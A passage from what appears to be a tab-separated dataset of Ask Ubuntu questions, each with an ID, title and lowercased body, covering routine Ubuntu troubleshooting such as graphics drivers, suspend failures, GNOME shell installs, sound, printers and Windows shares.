org.eclipse.swt.widgets.widget.sendevent ( unknown source ) at org.eclipse.swt.widgets.widget.sendevent ( unknown source ) at org.eclipse.swt.widgets.table.checkdata ( unknown source ) at org.eclipse.swt.widgets.table.celldataproc ( unknown source ) at org.eclipse.swt.widgets.display.celldataproc ( unknown source ) at org.eclipse.swt.internal.gtk.os._gtk_list_store_append ( native method ) at org.eclipse.swt.internal.gtk.os.gtk_list_store_append ( unknown source ) at org.eclipse.swt.widgets.table.setitemcount ( unknown source ) at org.eclipse.jface.viewers.tableviewer.dosetitemcount ( tableviewer.java:217 ) at org.eclipse.jface.viewers.abstracttableviewer.internalvirtualrefreshall ( abstracttableviewer.java:661 ) at org.eclipse.jface.viewers.abstracttableviewer.internalrefresh ( abstracttableviewer.java:635 ) at org.eclipse.jface.viewers.abstracttableviewer.internalrefresh ( abstracttableviewer.java:620 ) at org.eclipse.jface.viewers.structuredviewer $ 7.run ( structuredviewer.java:1430 ) at org.eclipse.jface.viewers.structuredviewer.preservingselection ( structuredviewer.java:1365 ) at org.eclipse.jface.viewers.structuredviewer.preservingselection ( structuredviewer.java:1328 ) at org.eclipse.jface.viewers.structuredviewer.refresh ( structuredviewer.java:1428 ) at org.eclipse.jface.viewers.columnviewer.refresh ( columnviewer.java:537 ) at org.eclipse.jface.viewers.structuredviewer.refresh ( structuredviewer.java:1387 ) at com.android.ddmuilib.logcat.logcatpanel $ logcattablerefreshertask.run ( logcatpanel.java:1000 ) at org.eclipse.swt.widgets.runnablelock.run ( unknown source ) ... 5 more i tried to change port for ddms in eclipse but it still does n't work .
103510	how do i downgrade firefox developer version to stable version on ubuntu+1 ?	i want to downgrade to firefox x stable from y beta due to add-on incompatibilities . for example from firefox 11 beta to firefox 10 stable . how can i go to stable channel ?
103514	delete files with particular character length and a extension in a directory using some command in terminal window	i would like to know what command must be executed in the terminal window which will enable us to delete files with a particular extension ( say .c ) in a particular directory whose name length is 6 characters . if not possible even a bash script consisting of a series of commands is also acceptable .
103515	a new linux user , trouble settting up nvidia and bumblebee	as the title suggests i 'm a new to linux and i 'm having some trouble setting up it up . i have a dell inspiron n5110 with an nvidia 525m and i7-2630qm . well after a bit of reading and confusing myself i followed instructions in this tutorial , which seemed to work . the battery usage dropped from ~2000 to ~1600 . thou it 's not as much as i 'd like to . so i tried the intel tweaks . after applying the intel tweaks it did n't take any effect , i think i did something wrong . thou i 'm not sure . but the comments stated that most people saw a drop to ~1000 . i wanted to try just disabled the card on boot with the instructions here : http : //github.com/bumblebee-project/bbswitch , but i ca n't open /etc/modules trough the terminal . it says `` permission denied '' or `` command not found '' if i use sudo /etc/modules . i 'm not sure what other info do you need to be able to make any sense of this . so just ask and tell you what i can . i 'd need to achieve a much lower usage one way or another , because i need to the laptop in class .
103516	grub2 : use maximum detected resolution ?	how do i tell grub2 to set its resolution ( and also the one passed to the kernel ) to the maximum one it can detect at time of boot ?
103520	how to completely uninstall gnome-shell and all extensions ?	i 'm having a bit of trouble getting the gnome-shell to work ever since i installed an extension ( i do n't know which ) on 11.10 . so what i would like to know is : how can i completely uninstall everything gnome-shell related ( all the extensions , gnome-tweak-tool etc ) , everything - so i can start fresh and re-install 'em all one by one . thanks in advance . edit : after a long and hard search ( for me anyway ) i found it : sudo apt-get remove gnome-shell-extensions-*
103521	lxde will not suspend when laptop lid is closed , and will die when woken up	i am not an experienced linux user , although i have been using ubuntu occassionally some time already . ( since feisty fawn probably ? ) . now i installed ubuntu 11.10 and it is nice ( well , after i installed lxde , unity sucks and i did n't really like gnome-fallback-session ) , but it has one problem : after being suspended , when i wake my computer up , it starts up and in about 5 seconds it dies . like a normal shutdown . then , when i start it again , the screen stays blank , so i have to hard-turn it off - only then , when i turn it on , it works . it is an msi laptop , about 3-4 years old . the second problem is : after installing lxde , when i close the laptop lid , it does not suspend . i can only suspend using the shutdown menu - and the waking up problem remains . many thanks for your time and advice guys .
103522	can not install gnome-shell	i have a problem installing gnome-shell . when i run sudo apt-get install gnome-shell , it says : gnome-shell : depends : libgnome-keyring0 ( > = 3.2.2-2~ ) but 3.2.0-0ubuntu1 is to be installed depends : libtelepathy-glib0 ( > = 0.15.6 ) but 0.15.5-1ubuntu1 is to be installed e : unable to correct problems , you have held broken packages . i tried to find libgnome-keyring0 in synaptic , but it says that i already have the latest version . please help . p.s . i do n't really need gnome-shell , i just need gnome-tweak-tool , which is gnome-shell dependent .
103533	volume & brightness control	i have just installed ubuntu 11.10 oneiric on my dell studio 1569 . i am experiencing a strange problem with brightness control , volume control etc : my hotkeys are enabled and , apparently , when i use them the indicator of volume and brightness changes . same result when i manually change brightness and volume . but to the change in the indicator does not correspond any change in the effective brightness and volume . any idea about what can i do ? thanks a lot , /matteo
103534	setting up dual monitors in ubuntu ( my laptop and one external monitor )	i am new to ubuntu . i am trying to connect an external monitor to my laptop . i have looked at many forums and the solutions do not work for me or are not simple enough for me to follow . when i try to add another monitor by choosing system > preferences > monitors i only see one pink monitor screen labelled as `` unknown '' . some websites suggested loading nvidia driver . i have tried the command nvidia-settings and now when i try system > preferences > monitors i get an alert that says `` it appears that your graphics driver does not support the necessary extensions to this tool . do you want to use your graphics driver vendor 's tool instead ? clicking yes goes to a window labelled nvidia x server settings and an alert says `` you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root and restart the x server . clicking no goes to the monitor preferences window displaying the pink unknown monitor . all help appreciated ( nothing would be too basic for me ! ) mel
103535	how to burn youtube videos on a dvd	i have downloaded some youtube videos . they have a .flv extension . i want to watch them on my tv with dvd . i burned them onto a dvd using brasero and xfburn , but my dvd recorder does not recognize them . what should i do ?
103536	need ubuntu with old kernel ( < 2.6.31 ) ?	i have here some old applications and modules which ones only run on older linux kernels . i need an ubuntu with kernel < 2.6.31 i tought there are two options : 1 . ) download 8.04/8.10 - there is an older kernel but i can not use apt-get anymore to get stuff : / i says its not supported 2 . ) using 11.10 and change the kernel . but thats the question how ? is it even possible ? any ideas ? thank you
103544	installation of mongodb via softwarecenter failed	i installed mongodb from the ubuntu software center , but when i want to run it from command line i get an error message like : mongod -- help for help and startup options sun feb 12 10:51:14 [ initandlisten ] mongodb starting : pid=2613 port=27017 dbpath=/data/db/ 64-bit sun feb 12 10:51:14 [ initandlisten ] db version v1.8.2 , pdfile version 4.5 sun feb 12 10:51:14 [ initandlisten ] git version : nogitversion sun feb 12 10:51:14 [ initandlisten ] build sys info : linux allspice 2.6.24-28-server # 1 smp wed aug 18 21:17:51 utc 2010 x86_64 boost_lib_version=1_46_1 sun feb 12 10:51:14 [ initandlisten ] exception in initandlisten std : :exception : unable to create / open lock file for lockfilepath : /data/db/mongod.lock errno:13 permission denied , terminating sun feb 12 10:51:14 dbexit : sun feb 12 10:51:14 [ initandlisten ] shutdown : going to close listening sockets ... sun feb 12 10:51:14 [ initandlisten ] shutdown : going to flush diaglog ... sun feb 12 10:51:14 [ initandlisten ] shutdown : going to close sockets ... sun feb 12 10:51:14 [ initandlisten ] shutdown : waiting for fs preallocator ... sun feb 12 10:51:14 [ initandlisten ] shutdown : closing all files ... sun feb 12 10:51:14 closeallfiles ( ) finished sun feb 12 10:51:14 [ initandlisten ] shutdown : removing fs lock ... sun feb 12 10:51:14 [ initandlisten ] could n't remove fs lock errno:9 bad file descriptor sun feb 12 10:51:14 dbexit : really exiting now i tried to create a repertory /data/db from my root but for some reason it 's not working . does anyone have a pointer ?
103546	ubuntu fails to boot after kernel update	i made a clean installed of ubuntu 11.10 32 bit without a problem . it came with kernel version 3.0.0.12 . i rebooted twice with no problem . after this i applied all the recommended updates from `` update manager '' including the kernel version 3.0.0.15 . after this the system does n't start anymore in normal boot mode . after the grub menu the screen remains black and there are no error messages but the âgnome login soundâ can be heard . i have to boot with recovery mode to use the system . i did this clean install because i had the same problem after the kernel update a few weeks ago and did n't find any solution to fix it . my system is a dell latitude e5510 , integrated intel graphics , with ubuntu 11.10 booting and running from an external usb hdd . thank you for the help .
103554	how to reset ubuntu to act as at the first start ?	i have an asus eee pc 1011px with ubuntu linux desktop edition v 10.10 . i want to revert its state before its first start where a wizard came up and asked things username , passwords , etc ... i hope there is a command or something to revert everything back to the first start .
103555	minecraft flickers sometimes and colors get buggy on an intel hd graphics 3000	i really like ubuntu , but i always had to switch back to windows just because i could n't get my intel hd graphics 3000 to work . so , 11.10 came out and i 'm trying to get things work in this update , so i can finally stay with ubuntu and use it . anyways , things seem to be more stable here , but they 're still a bit fishy . i 'm doing tests with minecraft . currently , there 's only 1 minor bug . the game flickers from time to time and the colors get buggy or something i read that maybe i should update to kernel 3.1 ? maybe 32-bit ubuntu is better ? it was impossible to play minecraft in 11.04 , but 11.10 is so much more stable .
103556	system will not boot after applying updates	i made a clean installtion of ubuntu 11.10 64 bit without problems and after completing the install i applied all the recommended updates from `` update manager '' . i 'm not sure if it was the kernel upgrade specifically that caused the problem but after applying all updates the system does n't start anymore in normal boot mode . after the grub menu the screen remains black and there are no error messages , i have to boot with recovery mode to use the system . i did this clean install because i had the same problem after the kernel update a few weeks ago and could n't find any solution to fix it . my system is an hp elitebook with ubuntu 11.10 booting and running from an external usb hdd .
103557	2 finger scolling goes crazy in firefox	in firefox , the 2-finger-scrolling is buggy . if you release one finger while scrolling , the page scrolls to the position the first finger indicates . it makes this rather nice function impossible to use . i know that some already are already aware of this problem . i 've found a thread where developers talking about this , but since i am new to ubuntu ( and to linux in general ) , i do n't know how to process the information from the following page : https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-input-synaptics/+bug/365943 how should i use the information from that page ? i 'm using ubuntu 11.10 .
103559	why does cinnamon desktop installation install unity and gnome packages ?	i recently installed cinnamon desktop package but when i rebooted then at the login screen , i saw apart from cinnamon , there was unity and gnome also present whereas i only installed cinnamon . why is this ? i am installing it on top of xubuntu , are the extra packages going to conflict with xfce apps when i 'll boot back into xubuntu ?
103562	installing sata 1tb 8mb seagate st1000lm024 5400rpm	i 'm installing ubuntu 11.10 on `` seagate st1000lm024 5400rpm '' which is `` 1t hdd/8g ssd '' disk . do i need to do something to use features of hybrid hdd/ssd ? if this disk does n't support ubuntu or the other linux , should i use this 8g ssd as a /boot partition ?
103564	external displays with bumblebee	i 'm trying to connect my external monitor ( via vga cable ) to my laptop , using bumblebee and the optimus configuration . i have a lenovo w520 , with an intel gma hd 3000 and an nvidia quadro 2000m . the bios has three options regarding the graphic cards - integrated , discrete , and optimus . the use case is very simple . for work , i just use the integrated card and the laptop display ; when i watch movies though , i want to use my projector . now , what i have to do in this case is : reboot start windows watch the movie thanks to bumblebee , i 'm able now to keep the setup always as optimus . before bb , i had to change the bios setting every time i wanted to watch a movie , because even in windows , using integrated graphics caused the projector not to be detected by the system ( i suppose that this is what they generally mean by `` hardwired output '' , and that the vga output is hardwired to the discrete card ) . now , what i 'd like to do , is to be able to connect the external monitor without having to switch o/s , that is , to use it in ubuntu . is it possible ? right now , if i want to use the external monitor on ubuntu , the only option is to change the bios to use the discrete graphics , then use nvidia-settings . if i use instead the optimus setup , even when i run it using `` optirun nvidia-settings -c :8 '' , i do n't get any option for an external monitor . is there something i can do ?
103565	how to empty gdm log files ?	i want to create a bugreport using ubuntu-bug and i would like to include the log files of gnome display manager ( gdm ) which i found in /var/log/gdm . to minimize the noise that may be in the logs i would like to empty them before i reproduce the bug . what is the best way to empty the log files ?
103584	same phone , different folders	i 'm sharing ubuntu one with my girlfriend , who has the same smartphone as me . as a result both the phone 's pictures end up in the same folder . is there a possibillity to use different folders ?
103587	fingerprint-gui can not recognize my upek reader ( 147e:1002 )	i 've got a new laptop which is lenove 's e420s . and i have encountered a big problem that i ca n't make the fingerprint reader work properly . i 've also tried fingerprint-gui . but unfortunately , it 's told that `` no device found '' . here is my screenshot : http : //ge.tt/98xg2wd/v/0 it 's said that 147e:1002 is supported by fingerprint-gui on the official website . so , i 'm curious about the situation . anybody knows ? p.s : i 'm using gentoo , but i think this problem may not have anything to do with distribution since i compiled the source from official site .
103588	unable to press 'e ' key in bash when i add export editor=vim in /etc/inputrc	when i add the line export editor=vim into /etc/inputrc and start a new session in bash , i am unable to press the e key on the keyboard . ( well , i can press it , physically , but nothing shows up in the terminal . ) at first i thought i did something to the keyboard , but it works in all the other apps running . the peculiarity only occurs in the newly started bash session . furthermore , if i use the insert any string from the clipboard into the terminal , all the e 's are ignored . watch : ubuntu @ ubuntu : ~ $ xclip -o cat /etc/inputrc ubuntu @ ubuntu : ~ $ # i shall pr_ss shift + ins now : ubuntu @ ubuntu : ~ $ cat /tc/inputrc cat : /tc/inputrc : no such file or directory no 'e ' in etc . interestingly , if i type apt-g < tab > , it completes the command and the 'e ' shows up : ubuntu @ ubuntu : ~ $ apt-g # before pressing tab ubuntu @ ubuntu : ~ $ apt-get # after tab finally , this is the last bit of /etc/inputrc : ubuntu @ ubuntu : ~ $ xclip -o | xargs tail # for freebsd console # `` \e [ h '' : beginning-of-line # `` \e [ f '' : end-of-line $ endif set completion-ignore-case on export editor= '' vim ''
103590	ubuntu wrongly warns `` not enough space '' which i do have	while i 'm trying to install ubuntu , i get the x about having less than 4.5gb space available . and when i 'm trying to look on my hard drive-i cant , i tried normally ' throw gparted and throw disk utility , but none of those show my drive , like it 's not exist ! what is strange is that i can boot with windows . why does it happens ? thanks for helping !
103594	how do i determine the mime type of a file ?	i recently switched to gnome3 and was surprised to find that there was no way by which we could set the default applications . i am writing a nautilus extension using bash . i want to find the mime type of a file . initially i used to extract the extension of the file using sed and build the code on it . then i realized that there is this command called file . when i try to find the mime-type of a mkv file , the command file -- mime-type -b < filename > outputs application/octet-stream but when i see the nautilus-properties window it shows the correct video/x-matroska mime-type . am i missing anything here ? ? if not is there a better way in which i can file the mime-type of a file ? thanks in advance : )
103601	how do i go back in the browser ?	i use the browser full screen . every-time i try to press the back button , the ubuntu side menu pops up . some people told me i need to do it very very fast , and it will work , but i am somewhat disabled ... ca n't do it fast . is there a way to put that bar down , where it was before ?
103606	on a desktop , is using 'suspend ' beneficial ?	i have a desktop with enough ram and whatever else required to run unity smoothly . my understanding is that the `` suspend '' option is usually for laptops . i used it recently and when booting up , it seemed to take as long - if not longer - than a clean boot . when and why would i use `` suspend '' on my desktop ? what are the advantages / disadvantages ?
103608	nvidia 9600 gm does n't detect displays	i 'm trying to connect my laptop to an external display . but the attached display is n't shown in ubuntu and neither is the laptop screen . i have an nvida 9600 gm card and i would like to connect another screen via vga port . how can this be resolved ?
103611	no sound with a n10/ich 7 audio controller	this problem is really stressing me out . no sound at all even when i turn up volume to loudest.on the sound setting the only options are ( on hardware ) off analog stereo output analog stereo input analog stereo duplex please help ! thank you this is what i got with lspci no idea what it means though ! ( is this the right thing ? ) cheryl @ ubuntu : ~ $ lspci 00:00.0 host bridge : intel corporation 82945g/gz/p/pl memory controller hub ( rev 02 ) 00:02.0 vga compatible controller : intel corporation 82945g/gz integrated graphics controller ( rev 02 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 00:1f.2 ide interface : intel corporation n10/ich7 family sata ide controller ( rev 01 ) 3f:00.0 ethernet controller : broadcom corporation netxtreme bcm5752 gigabit ethernet pci express ( rev 01 ) cheryl @ ubuntu : ~ $
103612	how to run gnome 3 shell after it is installed	i installed the scripts to install gnome 3 shell and i cant change from unity to gnome ? whats the procedure ?
103616	how can i change the color of the text in a terminal embedded in gedit ?	i am having trouble using the terminal in gedit since the text-color is white on gray background . i can not find an option to change anything for that terminal anywhere . how can i change it ? n.b . the python terminal is fine . obligatory screenshot :
103620	unable to login when using the try feature of ubuntu 11.10	everyone today for the first time i have download & burn the iso image of ubuntu 11.10 & when i tried to boot it . it went succussfuly but when i selected try ubuntu without installation . it worked but it asked me for user name & password . when ever i entered anything it says - invalid password . try again . please help me anyone asap . thanks ! ! ! !
103623	download files from a list	how can i download files ( that are listed in a text file ) using wget or some other automatic way ? sample file list : www.example.com/1.pdf www.example.com/2.pdf
103634	any good application for data usage monitor ?	i was wondering if there are any good applications to monitor how much data i use on my laptop in a month . my net connection has a restriction of how much data i can use after which the speed goes down considerably . i saw ntop , but i just wanted to ask if there are any other good options or suggestions regarding this . regards .
103635	how to navigate to local network ?	in nautilus ( v3.2.1 ) , in the left-hand navigation pane , there is an entry browse network . this is only available when the sidebar is set to places . i prefer the sidebar setting tree but then the entry browse network disappears . i 'm too much of a beginner to figure out where to look in the filesystem in order to find the networked computers ( file shares on windows 7 ) . when not using the places setting in the sidebar , how do i navigate to the network shares ?
103637	error while installing mesa in command 'make linux-x86 '	nir @ nir : ~/downloads/mesa-8.0 $ make linux-x86 make default make [ 1 ] : entering directory `/home/nir/downloads/mesa-8.0' make [ 2 ] : entering directory `/home/nir/downloads/mesa-8.0/src' making sources for linux-x86 make [ 3 ] : entering directory `/home/nir/downloads/mesa-8.0/src/glsl' flex -- nounistd -oglcpp/glcpp-lex.c glcpp/glcpp-lex.l make [ 3 ] : flex : command not found make [ 3 ] : *** התיינבל םיללכ ןיא ךא , `depend ' תשרוד `default ' הרטמ . stop . **//trnaslaet from hebrew : target 'default ' requires `depend ' but there are no rules for building . stop . ** make [ 3 ] : leaving directory `/home/nir/downloads/mesa-8.0/src/glsl' make [ 2 ] : *** [ subdirs ] 1 הלקת **//trnaslaet from hebrew : fault** make [ 2 ] : leaving directory `/home/nir/downloads/mesa-8.0/src' make [ 1 ] : *** [ default ] 1 הלקת **//trnaslaet from hebrew : fault** make [ 1 ] : leaving directory `/home/nir/downloads/mesa-8.0' make : *** [ linux-x86 ] 2 הלקת **//trnaslaet from hebrew : fault** nir @ nir : ~/downloads/mesa-8.0 $ is there any solution ? thanks !
103639	how to navigate to connected iphone ? filesystem path to `afc : //` ?	when i connect my iphone to ubuntu 11.10 , it gets automounted as afc : //ca60751cc4b1ebb427c2f9da324914b0643a21f8/ and i can see that there are photos stored in afc : //ca60751cc4b1ebb427c2f9da324914b0643a21f8/dcim/103apple . i would like to use programs to access these photo files , but they do n't accept the afc : // protocol -- they accept only normal file system paths . is there a `` normal file system equivalent '' to afc : // paths ?
103643	can not echo `` hello '' > x.txt even with sudo ?	i 'm trying to create a file in /var/www , but even with sudo this fails : user @ debvirtual : /var/www $ sudo echo `` hello '' > f.txt -bash : f.txt : permission denied when i use sudo nano , i can save something to this file . why ca n't i use sudo echo ?
103645	why are some windows shares not available ?	i have a windows 7 computer on my local network that hosts all my media . i 've shared relevant folders there without any limitation , so anyone should be able to access the files without providing a login . ( the wlan itself has a passcode , so i do n't need per-machine security . ) i can see this windows machine when i navigate to network : /// . i can navigate into it and see a lot of shares in smb : //media-pc// . i can open some of the shares , e.g . smb : //media-pc//users/torben/ but not e.g . smb : //media-pc//media/ i get the error : unable to mount location : failed to mount windows share . why can i access some of the windows shares on this computer , but not others ? i believe that i have shared them the same way .
103652	enable dual monitor on a broken screen	ive installed ubuntu on a notebook with a broken display with the help of an external monitor . when booting , the external monitor shows everything fine , but when the login appears , it stops output to the monitor . it seems that i can configure my outputs through xrandr , but i can not see anything happening and i can not also even check if the console is open to accept commands ( tried ctrl alt t ) . i have also tried xrandr -- output vga1 -- auto from another question posted here , but nothing seemed to happen ( tried with vga1 , vga0 , vga-1 and vga-0 too ) . does anyone have any idea how to work this around ?
103655	autocompletion does n't work while logged as root	i have just came across something that is really bothering me . autocompletion on ubuntu works like a charm but when i login as root , e.g . su i get tab autocompletion only sometimes . why does it work like that ? can one change that ?
103656	can we use the window snap feature to fit a window to half the screen in unity 2d ?	in unity 3d you can move a window to the left and right edge of the screen to fit it to half the screen . i 'm sure i saw this work on unity 2d on a fresh install on a friend 's computer without any tweaking . but on my ubuntu 11.10 with unity 2d it does n't . is this normal or am i missing something ? i 'm fairly sure it worked on unity 2d on a friend 's comp with no modifications . unless i 'm somehow running on a non-default window manager ? i 'm on the latest ubuntu 11.10 32-bit desktop , fully updated . i 'm not sure which window manager is supposed to be default for unity 2d and whether that makes a difference to the snap feature ?
103658	isight on ubuntu 11.10 ( macbook 4.1 )	yesterday i installed ubuntu 11.10 on my macbook 4.1 and just after installing the isight firmware by following the instructions here https : //help.ubuntu.com/community/mactelsupportteam/appleisight everything was working fine . i got appleusbvideosupport from here http : //turanct.wordpress.com/2010/06/ but afterwards i installed a bunch of updates ( around 300 ) and after rebooting isight is n't working anymore . i redid what is on that website above , i added the ppa sources and upgraded but no luck : ( can anyone help ! ? ! i really need to use the webcam as my dears are abroad . thanks a zillion
103660	ubuntu 11.10 vs windows 7 music quality	i 'm very disappointed about the sound quality on music when using ubuntu 11.10 compared to windows 7 . i use audacious ( winamp on w7 ) and no matter how much i decrease the volume slider it 's still giving me distorted sound and it 's so annoying . i tried the pulseaudio equalizer as i read but it gets worse .
103661	no internet 10.04	here 's my story , short as possible : it all started two years ago when two laptops with windows became unusable . i had nothing to lose , and went for a clean install of ubuntu . we were thrilled with the results , and have been until monday . monday , i decided to buy a desktop off craigslist ( the laptops are now old ) , and just pop ubuntu 10.04 on it from the same install cd . everything went fine , and the computer was running smooth , until i discovered i could n't plug in my ethernet cable for internet . i played with the network tool ( in the status bar ) , and also network tool . i put in my ip manually , and eventually it said it was connected , and showed activity , but i still had no internet . being busy with work , i never intended to use the ethernet anyway , and bought a usb adaptor for $ 10 off amazon which was recommended as `` trouble free . '' ( raylink rt5372 usb ) it does n't work . i tried downloading the driver , and compiling the .bz2 file into a .tar and installing from the terminal . did n't get any errors , but it is n't working . as potential solutions , i downloaded , and installed : fedora mint ubuntu 11.10 my raylink wireless card worked fine with any and all of those distros , but it seems that my ati radeon 9200 graphics card is n't very compatible , and the computer slows to a crawl . i 've been poking around the internet all week looking for , and trying , possible solutions . any advice ?
103662	ubuntu 11.10 logout on wake ?	i have a dell latitude e5400 with ubuntu 11.10 , and i have noticed a problem when waking up from sleep . i would close my lid , the laptop would go to sleep , but when i open the lid and it wakes up it shows my locked screen for a couple of seconds and then logs me out and takes me back to the login screen . i had this problem earlier , but i figured out that it was because i unplugged my usb mouse while it was on sleep . now i have this problem even when the hardware does not change .
103663	ubuntu freezes when i try to shutdown	when i try to shut down my computer , it freezes and never shuts down . this is because of problems with modem-manager in ubuntu 11.10 . even when i disable networking , i ca n't shut down . what i have tried : add rt2x** into black list kill modem-manager disable wifi the problem is : modem-manager : catch signal 15
103665	does ubuntu on computer with 64 bit processor , need to be 64 bit as well ?	i tried installing ubuntu 32-bit on my computer , but before the installation had really started , i got the error-page ending with panic occured , switching back to text console . i then tried installing the 64-bit version , and the installation started without problems . is there a fix to this problem , or do i need to use the 64-bit version ? will there be problems finding 64-bit versions of programs etc ?
103670	kubuntu 11.10 mobile broadband option is disabled	i am using sony vaio vpceb44en . i had installed kubuntu 11.10 and configured my samsung mobile phone there ( adding bluetooth device was successfully done . ) , but when i am trying to configure mobile broadband the option was disabled . i do n't know what the reason .
103672	how do i print labels with a brother pt-9500pc ?	we are converting our company from windows to ubuntu and we need to print technical labels with brother pt-9500pc printer connected over usb directly to the computer . ubuntu does have the driver in ptouch-driver package and i can even install it but nothing more . every time i try to print something from gimp/inkscape/glables3 only blank label prints with nothing on it . i use 36mm label with 36x30mm option manually selected in gimp/inkscape/glables3 . i ca n't log into http : //localhost:631/ to change something because it does not accept my username and password ( i tried almost every guide but it seems broken ) . ubuntu 11.10 64-bit , asus 1015bx , amd c-60 , 4gb ram , 120gb ocz ssd and ubuntu 11.10 64-bit , hp tx2 , amd turion x2 zm-84 , 4gb ram , 2x 500gb hdd
103679	laptop needs to be restarted after i close the lid	i close the lid on my hp pavilion laptop , and when i open it , i have to restart the laptop because the screen displays random streaks of colors . is there any way to fix this ? i have only used ubuntu for a few days .
103686	how do i rename a usb drive ?	how exactly would i rename a usb drive ? i 've read that you can go into the disk utility , the click on edit partition and there is an option to rename the label but i ca n't click in the area to rename . is there any other way ?
103689	installer reboots at `` detecting hardware '' ( disks and other hardware ) on all recent server installs	i have a very frustrating problem with my pc . i can not install any recent version of ubuntu server ( or even desktop ) since 9.04 even using the text-based installer . i boot from a usb stick created by unetbootin ( i also tried other methods such as startup disk creator with no difference ) . on the server installer , it gets to `` detecting hardware '' ( the second one about disks and all other hardware , not network hardware ) and then either hangs at 0 % ( waited 24 hours ) , or reboots after a minute or two . my system ( late 2007 ) : asus p5nsli motherboard intel core 2 duo e6600 2.4ghz 2 x 1gb corsair 667mhz ram nvidia geforce 6600 i have unplugged everything ( including the only hard disk , cd-roms and floppy ) . i have only one stick of ram ( tried each one to no avail ) and am booting the installer from a usb stick ( booting from cd-rom yields the same problem ) . i also tried several of the boot options ( nomodeset , nousb , acpi=off , noapic , i915.modeset=1/0 , xforcevesa ) in all combinations ) to no avail . the only active parts of my system are the video card , mouse , keyboard and usb stick . i have also updated the bios to the most recent version . ( fwiw , on the desktop installer , i get a black screen after hitting the install option . ) even after removing `` quiet '' i am unable to see what kernel panic is occurring ( or not occurring ) to cause the install to crash . i am only able to save the debug logs via a simple webserver in the installer . after the last line ( i repeatedly refreshed ) , the server stops responding and the installer hangs or reboots : jan 2 01:04:03 main-menu [ 302 ] : info : menu item 'disk-detect ' selected jan 2 01:04:04 kernel : [ 309.154372 ] sata_nv 0000:00:0e.0 : version 3.5 jan 2 01:04:04 kernel : [ 309.154409 ] sata_nv 0000:00:0e.0 : using swncq mode jan 2 01:04:04 kernel : [ 309.154531 ] sata_nv 0000:00:0e.0 : setting latency timer to 64 jan 2 01:04:04 kernel : [ 309.164442 ] scsi0 : sata_nv jan 2 01:04:04 kernel : [ 309.167610 ] scsi1 : sata_nv jan 2 01:04:04 kernel : [ 309.167762 ] ata1 : sata max udma/133 cmd 0x9f0 ctl 0xbf0 bmdma 0xd400 irq 10 jan 2 01:04:04 kernel : [ 309.167774 ] ata2 : sata max udma/133 cmd 0x970 ctl 0xb70 bmdma 0xd408 irq 10 jan 2 01:04:04 kernel : [ 309.167948 ] sata_nv 0000:00:0f.0 : using swncq mode jan 2 01:04:04 kernel : [ 309.168071 ] sata_nv 0000:00:0f.0 : setting latency timer to 64 jan 2 01:04:04 kernel : [ 309.171931 ] scsi2 : sata_nv jan 2 01:04:04 kernel : [ 309.173793 ] scsi3 : sata_nv jan 2 01:04:04 kernel : [ 309.173943 ] ata3 : sata max udma/133 cmd 0x9e0 ctl 0xbe0 bmdma 0xe800 irq 11 jan 2 01:04:04 kernel : [ 309.173954 ] ata4 : sata max udma/133 cmd 0x960 ctl 0xb60 bmdma 0xe808 irq 11 jan 2 01:04:04 kernel : [ 309.174061 ] pata_amd 0000:00:0d.0 : version 0.4.1 jan 2 01:04:04 kernel : [ 309.174160 ] pata_amd 0000:00:0d.0 : setting latency timer to 64 jan 2 01:04:04 kernel : [ 309.177045 ] scsi4 : pata_amd jan 2 01:04:04 kernel : [ 309.178628 ] scsi5 : pata_amd jan 2 01:04:04 kernel : [ 309.178801 ] ata5 : pata max udma/133 cmd 0x1f0 ctl 0x3f6 bmdma 0xf000 irq 14 jan 2 01:04:04 kernel : [ 309.178811 ] ata6 : pata max udma/133 cmd 0x170 ctl 0x376 bmdma 0xf008 irq 15 jan 2 01:04:04 net/hw-detect.hotplug : detected hotpluggable network interface eth0 jan 2 01:04:04 net/hw-detect.hotplug : detected hotpluggable network interface lo jan 2 01:04:04 kernel : [ 309.485062 ] ata3 : sata link down ( sstatus 0 scontrol 300 ) jan 2 01:04:04 kernel : [ 309.633094 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) jan 2 01:04:04 kernel : [ 309.641647 ] ata1.00 : ata-8 : st31000528as , cc38 , max udma/133 jan 2 01:04:04 kernel : [ 309.641658 ] ata1.00 : 1953525168 sectors , multi 1 : lba48 ncq ( depth 31/32 ) jan 2 01:04:04 kernel : [ 309.657614 ] ata1.00 : configured for udma/133 jan 2 01:04:04 kernel : [ 309.657969 ] scsi 0:0:0:0 : direct-access ata st31000528as cc38 pq : 0 ansi : 5 jan 2 01:04:04 kernel : [ 309.658482 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 jan 2 01:04:04 kernel : [ 309.658588 ] sd 0:0:0:0 : [ sda ] 1953525168 512-byte logical blocks : ( 1.00 tb/931 gib ) jan 2 01:04:04 kernel : [ 309.658812 ] sd 0:0:0:0 : [ sda ] write protect is off jan 2 01:04:04 kernel : [ 309.658823 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 jan 2 01:04:04 kernel : [ 309.658918 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua jan 2 01:04:04 kernel : [ 309.675630 ] sda : sda1 sda2 jan 2 01:04:04 kernel : [ 309.676440 ] sd 0:0:0:0 : [ sda ] attached scsi disk jan 2 01:04:05 kernel : [ 309.969102 ] ata2 : sata link down ( sstatus 0 scontrol 300 ) jan 2 01:04:05 kernel : [ 310.281137 ] ata4 : sata link down ( sstatus 0 scontrol 300 ) anybody have any additional ideas i could try ? i am getting ready to just 